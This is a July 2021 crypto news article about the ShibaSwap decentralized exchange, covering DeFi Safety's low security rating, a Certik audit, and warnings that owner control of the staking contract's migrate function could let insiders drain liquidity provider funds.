July 11: Updated to include the results of Certik's audit of the platform and DeFi Safety's subsequent upgrade of the rating to 35%.
Despite the immediate success of dog-themed decentralized exchange ShibaSwap, there are warnings that the DEX’s liquidity providers are throwing capital into an opaque protocol of questionable security.
Building on the popularity of their Doge-style token, Shiba Inu (SHIB), amid the Elon Musk-stoked dog-token trading frenzy, the coin’s developers launched their DEX with enticing yield incentives for liquidity providers on Tuesday.
Within 24 hours of launching, the protocol had amassed a total value locked (TVL) of more than $1 billion.
On Wednesday, platform reviewer DeFi Safety published a report on ShibaSwap, scoring the protocol at just 3%, far below the 70% level the site considers a pass.
Describing the score as “a devastating fail,” DeFi Safety failed ShibaSwap on all but two of its 22 review criteria, with the protocol scoring 30% for the clarity of information provided in its white paper.
The review’s author is Rex Hygate, the founder of SecuEth and Caliburn Consulting. He highlighted ShibaSwap’s anonymous team, lack of transparency and documentation and pointed to the fact there is no public software repository, development history, or way to test the code.
ShibaSwap is up with a devastating 3% score. If you are looking for a prime example of what absolute negligence looks like in a protocol, look no further than this. Zero Transparency. You are putting your money in a black hole. https://t.co/dUzU0vvCHW @ChrisBlec @ShibArmy #DeFi pic.twitter.com/QG3ykYakdt— DeFi Safety (@DefiSafety) July 7, 2021
The platform has since undergone an audit by Certik, which has worked with Crypto.com, Ontology and Neo, among others. The audit found eight major issues which it provided advice to the team and marked as resolved. Many of the centralization issues were resolved through the implementation of a six of nine multisig.
Following the release of Cerik's audit, DeFi Safety upgraded the rating to 35%, with biggest improvements in the 'Security' rating which scored 79% and 'Access Controls' whichincreased to 57%.
On Wednesday, Solidity developer Joseph Schiarizzi posted an article warning that ShibaSwap’s staking contract had been under the control of just a single address for most of its first day of operation.
While ShibaSwap has since updated the contract to a multi-signature account requiring six of nine Safe Owners to agree on transactions before they can be executed, Schiarizzi warns that each of the addresses may be under the control of a single entity:
“Multiple of these Safe Owners are new accounts with 0 transactions and no ETH, so they are most likely just place holders for the ShibaSwap devs who can agree easily to call any owner only function on the staking contract.”
Schiarizzi emphasized the risks associated with the staking contract’s migrate function being under the control of a single entity, identifying that the contract owners “can simply deploy a new migrator contract which sends themselves all the LP tokens.”
DeFi Watch analyst Chris Blec shared Schiarizzi’s warnings about ShibaSwap’s security risks to his 22,000 followers and highlighted the DeFi Safety review.
⚠️ Yesterday, it was noticed that all funds in ShibaSwap could be drained by 1 Ethereum account.— Chris Blec (@ChrisBlec) July 7, 2021
ShibaSwap then switched ownership to a new Gnosis multisig with unknown signers & fresh addresses.
The problem: it's possible to create a multisig and own all the keys yourself. pic.twitter.com/wSN1yOB2Qn